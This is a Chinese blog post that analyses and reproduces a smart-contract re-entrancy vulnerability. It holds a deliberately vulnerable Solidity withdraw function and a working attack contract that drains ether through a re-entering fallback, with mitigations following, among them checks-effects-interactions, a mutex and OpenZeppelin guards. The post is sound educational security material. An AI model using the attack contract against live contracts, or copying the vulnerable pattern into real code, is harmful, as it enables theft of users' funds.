智能合约Re-Entrancy重⼊漏洞分析与复现

智能合约Re-Entrancy重⼊漏洞分析与复现

智能合约Re-Entrancy重⼊漏洞

原理分析

外部恶意合约回调了受攻击合约上的一个函数,并在受攻击合约上的任意位置“重新进入”代码执行。因为原合约的程序员可能没有预料到合约代码可以被”重入“,因此合约会出现不可预知的行为。在 gas 足够的情况下,合约之间甚至可以相互循环调用,直至达到 gas 的上限,但是如果循环中有转账之类的操作,就会导致严重的后果。

  1. function withdraw(uint _amount) public {
  2. require(balances[msg.sender] >= _amount)
  3. msg.sender.call.value(_amount)();
  4. balances[msg.sender] -= _amount;
  5. }

其中,fallback函数是关键

fallback函数

当我们调用某个智能合约时,如果指定的函数找不到,或者根本就没指定调用哪个函数(如向合约发送 ether)时,fallback 函数就会被调用。

向合约发送 send、transfer、call 消息时候都会调用 fallback 函数,不同的是 send 和 transfer 有 2300 gas 的限制,也就是传递给 fallback 的只有 2300 gas,这个 gas 只能用于记录日志,因为其他操作都将超过 2300 gas。但 call 则会把剩余的所有 gas 都给 fallback 函数,这有可能导致循环调用。

fallback函数是可以被重写的

如果构造一个 fallback 函数,函数里面也调用对方的 withdraw 函数的话,那将会产生一个循环调用转账功能,存在漏洞的合约会不断向攻击者合约转账,终止循环结束(以太坊 gas 有上限)

漏洞demo

  1. pragma solidity ^0.6.10;
  2. contract Victim {
  3. mapping(address => uint) public balances;
  4. address public owner;
  5. //构造函数,设定合约所有者
  6. constructor() public {
  7. owner = msg.sender;
  8. }
  9. //接收资金转入
  10. function deposit() public payable {
  11. balances[msg.sender] += msg.value;
  12. }
  13. //提款
  14. function withdraw(uint _amount) public {
  15. require(balances[msg.sender] >= _amount);
  16. msg.sender.call{value: _amount}("");
  17. balances[msg.sender] -= _amount;
  18. }
  19. //查询余额
  20. function getBalance() public view returns(uint) {
  21. return address(this).balance;
  22. }
  23. }

攻击合约

  1. contract Attack {
  2. Victim public victim;
  3. //设定受害者合约地址
  4. constructor(address _victimAddress) public {
  5. victim = Victim(_victimAddress);
  6. }
  7. //重写fallback
  8. fallback() external payable {
  9. if(address(victim).balance >= 1 ether){
  10. victim.withdraw(1 ether);
  11. }
  12. }
  13. //攻击,调用受害者的withdraw函数
  14. function attack() external payable {
  15. require(msg.value >= 1 ether);
  16. victim.deposit{value: 1 ether}();
  17. victim.withdraw(1 ether);
  18. }
  19. //查询余额
  20. function getBalance() public view returns(uint) {
  21. return address(this).balance;
  22. }
  23. }

复现过程

虚拟机中

  • 分别为受害者和攻击者创建一个合约

  • 用deposit函数为受害者设定一定余额

  • 检查受害者余额

  • 进行攻击

  • 检查攻击者和受害者的余额

测试链上

  • 部署受害者合约

  • 部署攻击者合约

  • 为受害者合约打入2eth

  • 攻击

  • 结果

重入次数

由于gas的限制,重入次数是有一定限制的

调整参数,实验出最高重入次数

可以在区块链浏览器上查询到重入的次数

大约是9次

注意,一旦 out of gas 就会攻击失败。

规避建议

方法一

总是用 send()transfer() 来发送 ether,而不是用 call.value()。因为transfer和send函数的gas仅有2300,这点gas仅够捕获一个event,所以将无法进行可重入攻击。

方法二

确保在执行外部调用之前已经更新了所有的内部状态,这一模式被称为:Checks-Effects-Interactions(“检查-生效-交互”)

第一步,大多数函数会先做一些检查工作(例如谁调用了函数,参数是否在取值范围之内,它们是否发送了足够的以太币Ether ,用户是否具有token等等)。这些检查工作应该首先被完成。

第二步,如果所有检查都通过了,接下来进行更改合约状态变量的操作。

第三步,与其它合约的交互应该是任何函数的最后一步。

  1. require(balances[msg.sender] > amount); //检查
  2. require(this.balance > amount); //检查
  3. balances[msg.sender] -= amount; // 生效
  4. to.call.value(amount)(); // 交互

方法三

  1. 使用互斥锁:添加一个在代码执行过程中锁定合约的状态变量,可防止重入调用
  1. bool reEntrancyMutex = false;
  2. function withdraw(uint _amount) public {
  3. require(!reEntrancyMutex);
  4. reEntrancyMutex = true;
  5. require(balances[msg.sender] >= _amount);
  6. msg.sender.call{value: _amount}("");
  7. balances[msg.sender] -= _amount;
  8. reEntrancyMutex = false;
  9. }
  1. 使用OpenZeppelin官方的ReentrancyGuard合约nonReentrant modifier。

在函数中增加nonReentrant modifier可保证其不可重入,任何对该函数的重入操作都将以revert the call的方式来拒绝。

当合约中有多个函数时,由于modifier的粒度在单个函数,若想完全避免重入,应对每个函数都添加nonReentrant modifier。否则,仍然可以通过其他函数来重入然后发起重入攻击,若该函数可能破坏不变量。

  1. // SPDX-License-Identifier: MIT
  2. // OpenZeppelin Contracts v4.3.2 (security/ReentrancyGuard.sol)
  3. pragma solidity ^0.8.0;
  4. /**
  5. * @dev Contract module that helps prevent reentrant calls to a function.
  6. *
  7. * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
  8. * available, which can be applied to functions to make sure there are no nested
  9. * (reentrant) calls to them.
  10. *
  11. * Note that because there is a single `nonReentrant` guard, functions marked as
  12. * `nonReentrant` may not call one another. This can be worked around by making
  13. * those functions `private`, and then adding `external` `nonReentrant` entry
  14. * points to them.
  15. *
  16. * TIP: If you would like to learn more about reentrancy and alternative ways
  17. * to protect against it, check out our blog post
  18. * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
  19. */
  20. abstract contract ReentrancyGuard {
  21. // Booleans are more expensive than uint256 or any type that takes up a full
  22. // word because each write operation emits an extra SLOAD to first read the
  23. // slot's contents, replace the bits taken up by the boolean, and then write
  24. // back. This is the compiler's defense against contract upgrades and
  25. // pointer aliasing, and it cannot be disabled.
  26. // The values being non-zero value makes deployment a bit more expensive,
  27. // but in exchange the refund on every call to nonReentrant will be lower in
  28. // amount. Since refunds are capped to a percentage of the total
  29. // transaction's gas, it is best to keep them low in cases like this one, to
  30. // increase the likelihood of the full refund coming into effect.
  31. uint256 private constant _NOT_ENTERED = 1;
  32. uint256 private constant _ENTERED = 2;
  33. uint256 private _status;
  34. constructor() {
  35. _status = _NOT_ENTERED;
  36. }
  37. /**
  38. * @dev Prevents a contract from calling itself, directly or indirectly.
  39. * Calling a `nonReentrant` function from another `nonReentrant`
  40. * function is not supported. It is possible to prevent this from happening
  41. * by making the `nonReentrant` function external, and making it call a
  42. * `private` function that does the actual work.
  43. */
  44. modifier nonReentrant() {
  45. // On the first call to nonReentrant, _notEntered will be true
  46. require(_status != _ENTERED, "ReentrancyGuard: reentrant call");
  47. // Any calls to nonReentrant after this point will fail
  48. _status = _ENTERED;
  49. _;
  50. // By storing the original value once again, a refund is triggered (see
  51. // https://eips.ethereum.org/EIPS/eip-2200)
  52. _status = _NOT_ENTERED;
  53. }
  54. }
  1. 使用采用pull payment模式,OpenZeppelin提供了PullPayment合约

其提供了_asyncTransfer函数,与transfer类似。然而,它不会将资金发送给接收者,而是将其转移到托管合约中。此外,PullPayment还为接收者提供了一个公共功能来提取(pull)他们的支付:withdrawPayments

  1. // SPDX-License-Identifier: MIT
  2. // OpenZeppelin Contracts v4.3.2 (security/PullPayment.sol)
  3. pragma solidity ^0.8.0;
  4. import "../utils/escrow/Escrow.sol";
  5. /**
  6. * @dev Simple implementation of a
  7. * https://consensys.github.io/smart-contract-best-practices/recommendations/#favor-pull-over-push-for-external-calls[pull-payment]
  8. * strategy, where the paying contract doesn't interact directly with the
  9. * receiver account, which must withdraw its payments itself.
  10. *
  11. * Pull-payments are often considered the best practice when it comes to sending
  12. * Ether, security-wise. It prevents recipients from blocking execution, and
  13. * eliminates reentrancy concerns.
  14. *
  15. * TIP: If you would like to learn more about reentrancy and alternative ways
  16. * to protect against it, check out our blog post
  17. * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
  18. *
  19. * To use, derive from the `PullPayment` contract, and use {_asyncTransfer}
  20. * instead of Solidity's `transfer` function. Payees can query their due
  21. * payments with {payments}, and retrieve them with {withdrawPayments}.
  22. */
  23. abstract contract PullPayment {
  24. Escrow private immutable _escrow;
  25. constructor() {
  26. _escrow = new Escrow();
  27. }
  28. /**
  29. * @dev Withdraw accumulated payments, forwarding all gas to the recipient.
  30. *
  31. * Note that _any_ account can call this function, not just the `payee`.
  32. * This means that contracts unaware of the `PullPayment` protocol can still
  33. * receive funds this way, by having a separate account call
  34. * {withdrawPayments}.
  35. *
  36. * WARNING: Forwarding all gas opens the door to reentrancy vulnerabilities.
  37. * Make sure you trust the recipient, or are either following the
  38. * checks-effects-interactions pattern or using {ReentrancyGuard}.
  39. *
  40. * @param payee Whose payments will be withdrawn.
  41. */
  42. function withdrawPayments(address payable payee) public virtual {
  43. _escrow.withdraw(payee);
  44. }
  45. /**
  46. * @dev Returns the payments owed to an address.
  47. * @param dest The creditor's address.
  48. */
  49. function payments(address dest) public view returns (uint256) {
  50. return _escrow.depositsOf(dest);
  51. }
  52. /**
  53. * @dev Called by the payer to store the sent amount as credit to be pulled.
  54. * Funds sent in this way are stored in an intermediate {Escrow} contract, so
  55. * there is no danger of them being spent before withdrawal.
  56. *
  57. * @param dest The destination address of the funds.
  58. * @param amount The amount to transfer.
  59. */
  60. function _asyncTransfer(address dest, uint256 amount) internal virtual {
  61. _escrow.deposit{value: amount}(dest);
  62. }
  63. }
  • 发表于 2021-11-16 09:45:14
  • 阅读 ( 6281 )
  • 分类:漏洞分析

0 条评论

Sissice
Sissice

2 篇文章

站长统计